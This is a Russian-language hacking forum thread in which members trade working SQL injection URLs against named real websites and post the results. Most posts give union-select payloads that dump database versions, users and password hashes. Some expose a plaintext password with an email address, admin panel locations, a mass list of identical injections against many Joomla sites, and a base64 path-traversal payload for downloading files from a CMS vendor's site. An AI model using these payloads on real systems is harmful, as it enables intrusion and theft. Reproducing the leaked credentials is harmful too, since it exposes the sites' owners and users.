SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    GTA.com
    HTML:
    ttp://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
    root@localhost:4.0.12-log:gta
    HTML:
    http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user/*
    HTML:
    http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user+limit+2,10/*
    jmontilla:12107ef60046dd4c
     
    5 people like this.
  2. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Code:
    http://www.mamochka.org/modules.php?name=Top&querylang=union+select+1,TABLE_NAME,3,4+from+INFORMATION_SCHEMA.TABLES/*
     
    2 people like this.
  3. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://simplymichigan.com/blog/index.php?cat_id=99999+union+select+1,2,3,4,concat_ws(0x3a,user_name,password),6,7,8,9,10,11,12+from+users/*
    michi18_michigan@localhost:michi18_michigan:4.1.22-standard

    Code:
    http://www.absolutemusic.co.uk/shop/index.php?cat_id=99999+union+select+1,2,3,4,5,6,7,8,9,10/*
    absolute@localhost:absolute_:4.1.21-standard-log
     
    2 people like this.
  4. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    ШОП discountcycleshop.co.uk


    ddbuser1@localhost:4.1.22:discountdb
     
    1 person likes this.
  5. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://gp.by/index.php?mode=cat&cat_id=99999+union+select+1,2,3,4,5,6,7+from+admin/*
     
  6. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.photosale.ru/index.php?page=-1+union+select+concat_ws(0x2F,version(),database(),user())/*

    5.0.45-log/u41000/[email protected]

    -----------------------------------------------------------------------------

    biorust.com


    http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*

    5.0.22/biorust_com/biorust@localhost


    http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,admin_name,admin_password),3,4,5,6,7,8,9,10,11,12+from+biorust_com.linkbase_admins+limit+0,1/*

    имя/хеш
    Scrowler/4c2e348299295d7b87fa02fd14d89c7b


    http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,2,3,4,concat_ws(0x2F,username,password,email,icq),6,7,8,9,10,11,12+from+biorust_forums.user+limit+41000,1/*

    логин/хеш/мейл/уин
    premutos/35a8e932251deca43174675add295437/[email protected]/
     
    10 people like this.
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://grate.ru/index.php?cat_id=13'+union+select+0,1,2,3,4,5,conc at(version(),0x3a,user(),0x3a,database()),7,8,9,10 ,11,12,13,14,15/*

    Нет доступа к шемке:РР

    http://topofgames.com/index.php?cat_id=72'

    Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР

    http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*

    Дыра есь,но как обойти хз:РР


    http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,3/*

    Дальше не канает :Р
     
    2 people like this.
  8. nex0

    nex0 Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    52
    Likes Received:
    83
    Reputations:
    6
    mega.km.ru
    Code:
    http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=@@version
    @@version Microsoft SQL Server 2000 - 8.00.2039 (Intel IA-64) May 3 2005 23:34:52 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 1)
    db_name() ojigov
    system_user mega_link


    через
    Code:
    http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('dtproperties'))--
    нашел таблицы:
    dtproperties
    Rubr
    RubrLinksStat
    Search
    Stat
    StatOrder
    sysconstraints
    syssegments

    но интересных колонок в них не нашел=/
    p.s. в mssql я очень плохо разбираюсь, это вобще моя первая mssql inj, так что не судите строго, делал всё согласно статье от [ cash ]

    sosna1.ru
    version() 5.0.45-log
    user() [email protected]
    database() u71952
    Code:
    http://sosna1.ru/info.php?infoid=19999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11/*
    ethanol.org
    version() 4.1.15
    user() ETHANOL@LOCALHOST
    database() ETHANOLDB

    djbattle.net
    version() 4.1.12
    user() djbattle@localhost
    database() djbattle
    Code:
    http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,convert(concat(version(),0x3a,user(),0x3a,database()),binary),5,6,7,8,9,10,11/*
    нашел таблицу users.
    Code:
    http://www.djbattle.net/tv.php?tvID=99999+union+select+111,2,333,convert(concat(min(id),0x3a,user,0x3a,pass,0x3a,mail),binary),5,6,7,8,9,10,11+from+users/*
    id:user:рass:mail
    3:tobbe:1skills2:[email protected]
    он видимо админ
     
    #4748 nex0, 12 Feb 2008
    Last edited: 12 Feb 2008
    4 people like this.
  9. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    2 Велемир

    Не тормози =\

    HTML:
    http://www.dotfiles.com/index.php?cat_id=6+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database())/*
    HTML:
    http://www.nlstar.com/catalog/index.php?cat_id=17'+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database())/*
    http://www.mosenergo.ru/

    HTML:
    http://www.mosenergo.ru/eng/index.php?id=226&news_id=-1055+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5+FROM+information_schema.tables/*&theme=56&sessid=4a
    5.0.45-log:site@zvm5
     
    #4749 ~EviL~, 12 Feb 2008
    Last edited: 12 Feb 2008
    2 people like this.
  10. Vallez

    Vallez Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    88
    Likes Received:
    19
    Reputations:
    -8
    xcedz

    -1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--

    не работает .
     
  11. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Code:
    http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users/*
    http://www.job.khit.info/administrator/
    admin:40b5bf20806a044392ea48bc5c436262

    SQL Инъекция в Joomla/Mambo Component Job (com_job), нашел я, но сайтов больше с такой инъекцией не нашел.

    еще таблицы на этом домене (другие движки)
    Code:
    http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25+from+information_schema.tables/*
     
    1 person likes this.
  12. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    HTML:
    http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.pinfosystems.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.marketinginstyle.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.mangsidig.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.minet-services.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.sonicracingteam.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.g-linq.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users+limit+1/*
    http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.regionaleartiesten.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.rstasarim.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.tribudefilles.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.open-business.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    
    PS Начинаем утреннею зарядку =)))
     
    4 people like this.
  13. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Mambo Component Events SQL Injection
    Code:
    http://www.nwen.org/index.php?option=com_events&Itemid=15&id=-1+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mos_users/*
    http://www.nwen.org/administrator/
    admin;admin

    Найдено мной, сайтов с данным компонентом много, но на большинства, почему-то ничего не передается параметром id, который собственно и уязвим =/
     
    #4753 it's my, 13 Feb 2008
    Last edited: 13 Feb 2008
    1 person likes this.
  14. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    http://www.kompak.ru:8100/new/news/new.php?num=-342+union+select+1,2,3,4,5,6,7/*
    dbname = www
    dbuser =www@localhost
    dbversion =4.0.20
     
    2 people like this.
  15. db_reader

    db_reader Member

    Joined:
    23 Jan 2008
    Messages:
    11
    Likes Received:
    23
    Reputations:
    0
    www.uselessjunk.com PR4

    version: 5.0.26-Debian_2-log
    database: uselessj_uj2006
    user: uselessj_ohshitw@localhost



    Через лимит выводим всех админов.


    www.uselessjunk.com/admin.php -админка.
    Есть форум, на дедике.

    Но выведенные данные не подошли никуда,а к фтп я так и не смог законнектица.Шелл залить так же не вышло.
    :(
     
    3 people like this.
  16. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://www.novostroy.ru/law/direct.php?num=1056437&id=99999+union+select+1,2,3/*
    wwwnov@localhost:law:4.0.27-1-log




    Code:
    http://www.wholehealthexpo.com/information.php?infoid=99999+union+select+1,2,3,4,5,6/*
    [email protected]:dbheal:4.0.27-max-log


    Code:
    http://www.plenki.net/shipping.php?infoID=99999+union+select+1,2,3/*
    [email protected]:u10744:5.0.45-log

    Code:
    http://www.betonmaster.ru/index.php?view_info=yes&infoID=99999+union+select+1,2,3,4/*
    zrim@localhost:betonmaster:4.1.22-log






    Code:
    http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,concat_ws(0x3a,user,PASS),5,6,7,8,9,10,11+from+users+limit+0,1/*
    roundcube:583e2e1b2957e824
     
    3 people like this.
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,concat(user,0x3a,password)+from+mysql.user/*

    admin:40e369d51c6bd8e2
    pma_WHy8zYQ73Zhn:1c4230400a8e14af
    horde:234994c1665bd570
    nl_star:270037157a74bbe3
    nl_star_django:2490e08f0895cc0b

    :pPPPPPP
     
    3 people like this.
  18. db_reader

    db_reader Member

    Joined:
    23 Jan 2008
    Messages:
    11
    Likes Received:
    23
    Reputations:
    0
    www.davisvisitor.com

    _http://www.davisvisitor.com/additional.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*

    4.0.16:dvb@localhost:dvb

    Ни одной таблицы не смог подобрать. Если кто сможет-отпишите плз...
     
    2 people like this.
  19. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    дерзаем
    Таблицы
    counter
     
    #4759 kair, 13 Feb 2008
    Last edited: 13 Feb 2008
  20. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    http://www.modxcms.com
    Официальный сайт CMS MODx

    Существует иньекция и возможность скачать любые файлы с сайта.
    Пример ссылки:
    Code:
    http://www.modxcms.com/assets/snippets/repository/repo_download/download.php?dwnParam=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaG9tZS9odHRwZC92aG9zdHMvbW9keGNtcy5jb20vaHR0cGRvY3N8MTAzNyBBTkQgMT0xfHJlcG9fZGNvdW50fGluZGV4LnBocHxwYXNzd2Q
    Для иньекции передаём строку кодированную в base64, приблизительно такого содержания:
    1|2|repo_dcount|3|blabla.txt
    1. - путь к файлу
    2. - уязвимый параметр для SQLinj
    3. - имя файла который хотим скачать
    пример:
    ../../../../../../../../../../../../../../home/httpd/vhosts/modxcms.com/httpdocs|1037 AND 1=(select 1)|repo_dcount|index.php|passwd
    --------------------------------------------------
    не претиндую что первый, но нашёл 30 мин назад, хотел ставить себе эту CMS....
     
    #4760 big_BRAT, 13 Feb 2008
    Last edited: 13 Feb 2008
    5 people like this.
Thread Status:
Not open for further replies.